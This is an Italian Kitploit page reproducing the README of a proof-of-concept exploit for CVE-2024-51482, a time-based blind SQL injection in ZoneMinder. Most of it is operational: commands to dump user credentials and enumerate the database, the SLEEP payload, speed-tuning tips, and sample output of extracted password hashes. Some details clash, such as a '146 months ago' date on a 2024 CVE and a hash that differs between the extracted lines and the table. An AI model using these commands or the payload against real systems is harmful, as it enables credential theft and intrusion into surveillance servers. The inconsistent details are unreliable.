Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-51482-PoC — PoC di SQL injection blind basata sul tempo con autenticazione per ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64) | Kitploit
Strumenti/GitHubGitHub/plur1bu5/cve-2024-51482-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubplur1bu5/cve-2024-51482-poc

CVE-2024-51482-PoC

PoC di SQL injection blind basata sul tempo con autenticazione per ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64)

Vedi Repository
146 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-51482-PoC

Exploit autenticato di SQL injection cieca basata sul tempo per ZoneMinder v1.37. <= 1.37.64*

Panoramica

Questo è un proof-of-concept di exploit per CVE-2024-51482, una vulnerabilità di SQL injection cieca basata sul tempo nella funzionalità di gestione degli eventi di ZoneMinder. L'exploit richiede l'autenticazione e utilizza query SLEEP condizionali per estrarre dati dal database.

Caratteristiche

  • Sfruttamento autenticato - Accesso con credenziali o cookie di sessione
  • Rilevamento della lunghezza - Ricerca binaria per trovare la lunghezza esatta della stringa prima dell'estrazione
  • Estrazione parallela - Estrazione multi-thread dei caratteri per velocizzare
  • Opzioni in stile sqlmap - Enumerazione di database, tabelle, colonne e dump dei dati
  • Impostazioni predefinite sicure - Ritardo di 3s, 5 thread per alta precisione
  • Monitoraggio dell'avanzamento - Progresso dell'estrazione in tempo reale con modalità verbosa
  • Output pulito - Visualizzazione tabellare formattata per i dati estratti

Requisiti

root@kitploit:~
pip install requests

Avvio rapido

Modalità predefinita - Dump delle credenziali

root@kitploit:~
python3 poc.py -t example.local -u admin -p password

Con cookie di sessione

root@kitploit:~
python3 poc.py -t example.local --cookie 'ZMSESSID_value'

Modalità verbosa

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -v

Utilizzo

Enumerare database

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --dbs

Enumerare tabelle

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm --tables

Enumerare colonne

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns

Dump di una tabella specifica

root@kitploit:~
python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump

Opzioni

root@kitploit:~
Required:
  -t, --target TARGET       Target URL (IP, hostname, or full URL)
  
Authentication:
  -u, --username USERNAME   Username for authentication
  -p, --password PASSWORD   Password for authentication
  --cookie COOKIE           Session cookie (ZMSESSID)

Enumeration:
  --dbs                     Enumerate databases
  -D, --database DATABASE   Database to use
  --tables                  Enumerate tables
  -T, --table TABLE         Table to use
  --columns                 Enumerate columns
  --dump                    Dump table data

Performance:
  --delay DELAY             Time delay in seconds (default: 3, safe)
  --threads THREADS         Number of threads (default: 5, safe)
  -v, --verbose             Show extraction progress

Ottimizzazione delle prestazioni

Modalità sicura (consigliata)

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5
  • Velocità: ~2-3 minuti per hash di password
  • Precisione: Alta

Modalità veloce (potrebbe avere errori)

root@kitploit:~
python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20
  • Velocità: ~30-60 secondi per hash di password
  • Precisione: Potrebbe produrre caratteri errati

Esempio di output

root@kitploit:~
[*] Target: http://example.local
[*] Delay: 3s | Threads: 5
[+] Authenticated as admin
[*] Testing vulnerability...
[+] Target is VULNERABLE!

[*] Default mode: Dumping zm.Users credentials...
[*] Dumping data from 'zm.Users'...
[+] Extracted: admin
[+] Extracted: $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extracted: john
[+] Extracted: $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.

====================================================================================
| Username   | Password                                                      |
====================================================================================
| admin      | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john       | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================

[+] 2 entries dumped

Come funziona

  1. Autenticazione - Effettua l'accesso con credenziali o utilizza il cookie di sessione fornito
  2. Test della vulnerabilità - Conferma che il target è vulnerabile con un semplice payload SLEEP
  3. Rilevamento della lunghezza - Utilizza la ricerca binaria per trovare la lunghezza esatta della stringa
  4. Estrazione parallela - Estrae tutte le posizioni dei caratteri simultaneamente
  5. Visualizzazione dei dati - Formatta i risultati in una tabella pulita

Formato del payload

L'exploit utilizza SLEEP condizionale:

root@kitploit:~
1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)
  • Condizione VERA: Nessun ritardo (0 secondi)
  • Condizione FALSA: Ritardo completo (3 secondi)

Risoluzione dei problemi

Risultati imprecisi

Se ottieni caratteri errati (es. $ diventa 8):

root@kitploit:~
# Increase delay and reduce threads
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3

Troppo lento

Se l'estrazione è troppo lenta:

root@kitploit:~
# Decrease delay and increase threads (may reduce accuracy)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10

Nessun dato trovato

Se zm.Users predefinito non esiste:

root@kitploit:~
# Enumerate databases first
python3 poc.py -t example.local -u admin -p password --dbs

# Then enumerate tables
python3 poc.py -t example.local -u admin -p password -D database_name --tables

Informazioni CVE

  • CVE ID: CVE-2024-51482
  • Versioni interessate: ZoneMinder v1.37.* <= 1.37.64
  • Corretto in: v1.37.65
  • Tipo di vulnerabilità: SQL injection cieca basata sul tempo
  • CVSS Score: TBD

Dichiarazione di esclusione di responsabilità

Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati.

  • Non utilizzare questo strumento su sistemi di cui non sei proprietario o per i quali non hai esplicita autorizzazione al test
  • L'accesso non autorizzato a sistemi informatici è illegale
  • L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento
  • Ottenere sempre la dovuta autorizzazione prima di condurre valutazioni sulla sicurezza

Riferimenti

  • NVD - CVE-2024-51482
  • ZoneMinder GitHub

Licenza

Questo progetto è fornito esclusivamente a scopo educativo. Usalo in modo responsabile ed etico.


⭐ Se lo trovi utile, aggiungi una stella al repository!

Scarica lo strumento